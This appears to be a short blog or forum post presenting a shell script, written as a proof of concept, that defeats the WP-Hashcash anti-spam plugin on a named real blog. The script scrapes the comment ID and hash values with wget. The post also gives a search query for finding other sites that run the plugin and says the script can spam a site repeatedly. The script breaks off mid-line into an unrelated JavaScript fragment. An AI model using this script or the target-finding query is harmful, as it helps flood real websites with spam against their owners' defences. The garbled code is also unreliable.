= Exploit = As a proof of concept, I wrote a shell script to break hashcash. It works on the author's own blog: [code] AUTHOR='test' EMAIL='test' URL='test' COMMENT='test' SITE='http://elliottback.com/wp' POST='/archives/2005/05/11/wordpress-hashcash-20/' CPID="$(wget -O - "$SITE$POST" 2>/dev/null | grep 'comment_post_ID' | cut -d'"' -f 14)" MD5="$(wget -O - "$SITE$POST" 2>/dev/null | grep '
>5]|=(str.charCodeAt(i/8)&mask)<<(i%32);return bin;} [/code] or just do this: ;) http://www.google.com/search?q=%22Powered+by+WP-Hashcash%22 Elliot Back thinks people can't code around his obfuscation. It's rather trivial to defeat -- and this script can spam his site one after another with a little addition or two -- determining the length of ABSPATH for a single site doesn't take that long either, and once you have it, it's the same for all posts. He appears to does some fancy stuff, too "per-user", but a spammer isn't going to be "a user" or bother to become one. Of course, you can just "interpret" his javascript, too, like some spammers already can do, but that can be more effort than it's worth.